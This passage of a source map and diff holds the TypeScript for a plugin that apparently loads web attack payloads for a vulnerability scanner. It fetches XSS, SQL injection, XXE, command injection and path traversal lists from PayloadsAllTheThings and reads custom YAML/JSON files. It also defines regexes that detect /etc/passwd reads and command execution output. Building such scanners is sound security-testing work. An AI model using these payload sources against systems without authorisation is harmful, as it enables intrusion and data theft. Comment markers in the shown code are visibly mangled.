Map();\n\n/\n Get available PayloadBox types\n /\nexport function getPayloadBoxTypes(): PayloadBoxType[] {\n return Object.keys(PAYLOADBOX_URLS) as PayloadBoxType[];\n}\n\n/\n Check if a type is a valid PayloadBox type\n /\nexport function isPayloadBoxType(type: string): type is PayloadBoxType {\n return type in PAYLOADBOX_URLS;\n}\n\n/\n Load payloads from PayloadBox\n \n @param type - PayloadBox type (xss, sql-injection, etc.)\n * @param limit - Maximum number of payloads to include\n * @param fetchFn - Fetch function to use (for testing/DI)\n /\nexport async function loadPayloadBox(\n type: string,\n limit: number = 50,\n fetchFn: typeof fetch = globalThis.fetch,\n): Promise<RuntimePayload> {\n // Validate type\n if (!isPayloadBoxType(type)) {\n throw new Error(\n `Unknown PayloadBox type: ${type}. Available: ${getPayloadBoxTypes().join(\", \")}`,\n );\n }\n\n // Check cache\n const cached = cache.get(type);\n if (cached) {\n return cached;\n }\n\n const url = PAYLOADBOX_URLS[type];\n\n try {\n const response = await fetchFn(url);\n if (!response.ok) {\n throw new Error(\n `Failed to fetch: ${response.status} ${response.statusText}`,\n );\n }\n\n const text = await response.text();\n const payloads = text\n .split(\"\\n\")\n .map((line) => line.trim())\n .filter((line) => line && !line.startsWith(\"#\"))\n .slice(0, limit);\n\n if (payloads.length === 0) {\n throw new Error(`No payloads found in ${type}`);\n }\n\n const payload: RuntimePayload = {\n name: `payloadbox:${type}`,\n category: CATEGORY_MAP[type],\n description: `PayloadsAllTheThings ${type} - ${payloads.length} payloads`,\n payloads,\n detectPatterns: getDefaultPatterns(type),\n source: \"payloadbox\",\n };\n\n // Cache it\n cache.set(type, payload);\n return payload;\n } catch (err) {\n throw new Error(\n `Failed to fetch PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n}\n\n/\n Get default detection patterns for PayloadBox types\n /\nfunction getDefaultPatterns(type: PayloadBoxType): RegExp[] {\n switch (type) {\n case \"xss\":\n return [\n /<script[^>]>alert\$/i,\n /onerror\\s=\\salert\\(/i,\n /onload\\s=\\salert\\(/i,\n /javascript:alert\\(/i,\n ];\n case \"sql-injection\":\n return [\n /sql.syntax/i,\n /mysql.error/i,\n /ORA-\\d{5}/i,\n /pg_query/i,\n /sqlite.error/i,\n ];\n case \"xxe\":\n return [/root:.:0:0/i, /\\[fonts\\]/i];\n case \"command-injection\":\n return [/uid=\\d+\\([\\w]+\$/i, /root:.:0:0/i];\n case \"open-redirect\":\n return []; // Detected by redirect behavior\n case \"path-traversal\":\n return [/root:.:0:0/i, /\\[fonts\\]/i, /\\[extensions\\]/i];\n default:\n return [];\n }\n}\n\n/*\n Clear PayloadBox cache\n /\nexport function clearPayloadBoxCache(): void {\n cache.clear();\n}\n","/\n File Loader\n * Loads custom payloads from YAML/JSON files\n /\n\nimport { readFile } from \"node:fs/promises\";\nimport { resolve, isAbsolute, extname } from \"node:path\";\nimport YAML from \"yaml\";\nimport { z } from \"zod\";\nimport type { RuntimePayload, PayloadCategory } from \"@vulcn/engine\";\n\n/\n Valid payload categories\n /\nconst PAYLOAD_CATEGORIES: PayloadCategory[] = [\n \"xss\",\n \"sqli\",\n \"ssrf\",\n \"xxe\",\n \"command-injection\",\n \"path-traversal\",\n \"open-redirect\",\n \"custom\",\n];\n\n/\n Schema for a single custom payload\n /\nconst CustomPayloadSchema = z.object({\n name: z.string().min(1),\n category: z.enum(\n PAYLOAD_CATEGORIES as [PayloadCategory, ...PayloadCategory[]],\n ),\n description: z.string().optional(),\n payloads: z.array(z.string()).min(1),\n detectPatterns: z.array(z.string()).optional(),\n});\n\n/\n Schema for a payload file (can contain multiple payloads)\n /\nconst PayloadFileSchema = z.object({\n version: z.string().optional(),\n payloads: z.array(CustomPayloadSchema),\n});\n\n/\n Load multiple payload files\n /\nexport async function loadFromFiles(\n filePaths: string[],\n): Promise<RuntimePayload[]> {\n const payloads: RuntimePayload[] = [];\n\n for (const filePath of filePaths) {\n const loaded = await loadFromFile(filePath);\n payloads.push(...loaded);\n }\n\n return payloads;\n}\n\n/\n Load payloads from a single file\n /\nexport async function loadFromFile(\n filePath: string,\n): Promise<RuntimePayload[]> {\n const resolved = isAbsolute(filePath)\n ? filePath\n : resolve(process.cwd(), filePath);\n\n const content = await readFile(resolved, \"utf-8\");\n const ext = extname(resolved).toLowerCase();\n\n // Parse based on extension\n let data: unknown;\n if (ext === \".json\") {\n data = JSON.parse(content);\n } else if (ext === \".yml\" \|\| ext === \".yaml\") {\n data = YAML.parse(content);\n } else {\n throw new Error(\n `Unsupported file extension: ${ext}. Use .yml, .yaml, or .json`,\n );\n }\n\n // Parse and validate\n return parsePayloadData(data);\n}\n\n/\n Parse and validate payload data\n /\nfunction parsePayloadData(data: unknown): RuntimePayload[] {\n const dataObj = data as Record<string, unknown>;\n\n let parsed;\n\n if (Array.isArray(data)) {\n // Array of payload objects\n parsed = { version: \"1\", payloads: data };\n } else if (dataObj?.name && dataObj?.category) {\n // Single payload object (has name and category)\n parsed = { version: \"1\", payloads: [CustomPayloadSchema.parse(data)] };\n } else if (dataObj?.payloads && Array.isArray(dataObj.payloads)) {\n // File schema with payloads array\n parsed = PayloadFileSchema.parse(data);\n } else {\n throw new Error(\n \"Invalid payload file format. Expected: array of payloads, file schema, or single payload object\",\n );\n }\n\n // Convert to RuntimePayload[]\n return parsed.payloads.map(\n (p): RuntimePayload => ({\n name: p.name,\n category: p.category,\n description: p.description \|\| `Custom payload: ${p.name}`,\n payloads: p.payloads,\n detectPatterns: parseDetectPatterns(p.detectPatterns),\n source: \"custom\",\n }),\n );\n}\n\n/\n Parse detect patterns from strings to RegExp\n */\nfunction parseDetectPatterns(patterns?: string[]): RegExp[] {\n if (!patterns \|\| patterns.length === 0) {\n return [];\n }\n\n const regexps: RegExp[] = [];\n for (const pattern of patterns) {\n try {\n regexps.push(new RegExp(pattern, \"i\"));\n } catch {\n console.warn(`Invalid regex pattern: ${pattern}`);\n }\n }\n return regexps;\n}\n"],"mappings":"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","names":["import_zod","YAML"]}
1	+ {"version":3,"sources":["../src/index.ts","../src/loaders/payloadbox.ts","../src/loaders/file.ts"],"sourcesContent":["/*\n @vulcn/plugin-payloads\n * Official payload loader plugin for Vulcn\n \n Payload sources (in order of priority):\n * 1. PayloadBox — community-curated payloads from PayloadsAllTheThings (default)\n * 2. Custom files — expert-provided YAML/JSON payload files\n \n Short aliases for payload types:\n * xss, sqli, xxe, cmd, redirect, traversal\n /\n\nimport { z } from \"zod\";\nimport type { VulcnPlugin, PluginContext, RuntimePayload } from \"@vulcn/engine\";\nimport { loadPayloadBox, resolvePayloadType } from \"./loaders/payloadbox\";\nimport { loadFromFiles } from \"./loaders/file\";\n\n/\n Plugin configuration schema\n /\nconst configSchema = z.object({\n /\n Payload types to load from PayloadsAllTheThings.\n * Accepts short aliases: xss, sqli, xxe, cmd, redirect, traversal\n * @example [\"xss\", \"sqli\"]\n /\n types: z.array(z.string()).optional(),\n\n /\n Maximum payloads per type (default 50)\n /\n limit: z.number().default(50),\n\n /\n Custom payload files to load (YAML/JSON)\n /\n files: z.array(z.string()).optional(),\n});\n\nexport type PayloadsPluginConfig = z.infer<typeof configSchema>;\n\n/\n Payloads Plugin\n /\nconst plugin: VulcnPlugin = {\n name: \"@vulcn/plugin-payloads\",\n version: \"0.3.0\",\n apiVersion: 1,\n description: \"Payload loader — PayloadsAllTheThings + custom files\",\n\n configSchema,\n\n hooks: {\n onInit: async (ctx: PluginContext) => {\n const config = configSchema.parse(ctx.config);\n const loadedPayloads: RuntimePayload[] = [];\n\n // 1. Load from PayloadBox (primary source)\n if (config.types?.length) {\n for (const type of config.types) {\n try {\n const payload = await loadPayloadBox(type, config.limit, ctx.fetch);\n loadedPayloads.push(payload);\n ctx.logger.debug(`Loaded payload type: ${type}`);\n } catch (err) {\n ctx.logger.error(\n `Failed to load \"${type}\": ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n }\n }\n\n // 2. Load from custom files\n if (config.files?.length) {\n try {\n const filePayloads = await loadFromFiles(config.files);\n loadedPayloads.push(...filePayloads);\n ctx.logger.debug(\n `Loaded ${filePayloads.length} payload sets from files`,\n );\n } catch (err) {\n ctx.logger.error(\n `Failed to load custom files: ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n }\n\n // Add to shared context\n ctx.payloads.push(...loadedPayloads);\n\n ctx.logger.info(\n `Payloads plugin loaded ${loadedPayloads.length} payload sets`,\n );\n },\n },\n};\n\nexport default plugin;\n\n// Re-export for direct access\nexport {\n loadPayloadBox,\n getPayloadBoxTypes,\n resolvePayloadType,\n isValidPayloadName,\n getDescription,\n getAliases,\n clearPayloadBoxCache,\n} from \"./loaders/payloadbox\";\nexport { loadFromFiles, loadFromFile } from \"./loaders/file\";\n","/\n PayloadBox Loader\n \n Fetches payloads from PayloadsAllTheThings GitHub repository.\n * This is the primary payload source for Vulcn — community-curated,\n * battle-tested payloads from the largest security payload collection.\n \n Supports short aliases for convenience:\n * xss, sqli, xxe, cmd, redirect, traversal\n /\n\nimport type { RuntimePayload, PayloadCategory } from \"@vulcn/engine\";\n\n/\n Canonical PayloadBox type names (as they appear in PayloadsAllTheThings)\n /\nexport type PayloadBoxType =\n \| \"xss\"\n \| \"sql-injection\"\n \| \"xxe\"\n \| \"command-injection\"\n \| \"open-redirect\"\n \| \"path-traversal\";\n\n/\n Short aliases → canonical PayloadBox types\n \n Users can use either:\n * vulcn run session.yml -p xss sqli\n * vulcn run session.yml -p sql-injection command-injection\n /\nconst ALIASES: Record<string, PayloadBoxType> = {\n // Short aliases\n xss: \"xss\",\n sqli: \"sql-injection\",\n sql: \"sql-injection\",\n xxe: \"xxe\",\n cmd: \"command-injection\",\n command: \"command-injection\",\n redirect: \"open-redirect\",\n traversal: \"path-traversal\",\n lfi: \"path-traversal\",\n\n // Full names (identity mapping)\n \"sql-injection\": \"sql-injection\",\n \"command-injection\": \"command-injection\",\n \"open-redirect\": \"open-redirect\",\n \"path-traversal\": \"path-traversal\",\n};\n\n/\n PayloadsAllTheThings URLs - raw GitHub content\n /\nconst PAYLOADBOX_URLS: Record<PayloadBoxType, string> = {\n xss: \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XSS%20Injection/Intruders/IntrudersXSS.txt\",\n \"sql-injection\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/Auth_Bypass.txt\",\n xxe: \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XXE%20Injection/Intruders/xxe_payloads.txt\",\n \"command-injection\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Command%20Injection/Intruder/command_exec.txt\",\n \"open-redirect\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Open%20Redirect/Intruder/Open-Redirect-payloads.txt\",\n \"path-traversal\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Directory%20Traversal/Intruder/traversals-8-deep-exotic-encoding.txt\",\n};\n\n/\n Map PayloadBox types to internal categories\n /\nconst CATEGORY_MAP: Record<PayloadBoxType, PayloadCategory> = {\n xss: \"xss\",\n \"sql-injection\": \"sqli\",\n xxe: \"xxe\",\n \"command-injection\": \"command-injection\",\n \"open-redirect\": \"open-redirect\",\n \"path-traversal\": \"path-traversal\",\n};\n\n/\n Human-readable descriptions\n /\nconst DESCRIPTIONS: Record<PayloadBoxType, string> = {\n xss: \"Cross-Site Scripting — script injection, event handlers, SVG payloads\",\n \"sql-injection\": \"SQL Injection — auth bypass, UNION, error-based, blind\",\n xxe: \"XML External Entity — file read, SSRF via XML\",\n \"command-injection\": \"OS Command Injection — shell execution, pipe injection\",\n \"open-redirect\": \"Open Redirect — URL redirect to attacker domain\",\n \"path-traversal\":\n \"Path Traversal — directory traversal with exotic encodings\",\n};\n\n/\n Cache for fetched payloads\n /\nconst cache: Map<PayloadBoxType, RuntimePayload> = new Map();\n\n// ── Public API ─────────────────────────────────────────────────────────\n\n/\n Get all available payload type names (canonical)\n /\nexport function getPayloadBoxTypes(): PayloadBoxType[] {\n return Object.keys(PAYLOADBOX_URLS) as PayloadBoxType[];\n}\n\n/\n Get all short aliases\n /\nexport function getAliases(): Record<string, PayloadBoxType> {\n return { ...ALIASES };\n}\n\n/\n Resolve a user-provided name to a canonical PayloadBox type.\n \n Accepts:\n * \"xss\" → \"xss\"\n * \"sqli\" → \"sql-injection\"\n * \"sql-injection\" → \"sql-injection\"\n * \"cmd\" → \"command-injection\"\n \n Returns null if the name doesn't match any known type.\n /\nexport function resolvePayloadType(name: string): PayloadBoxType \| null {\n const resolved = ALIASES[name.toLowerCase()];\n return resolved ?? null;\n}\n\n/\n Check if a name resolves to a valid PayloadBox type\n /\nexport function isValidPayloadName(name: string): boolean {\n return resolvePayloadType(name) !== null;\n}\n\n/\n Get description for a payload type\n /\nexport function getDescription(type: PayloadBoxType): string {\n return DESCRIPTIONS[type] ?? type;\n}\n\n/\n Load payloads from 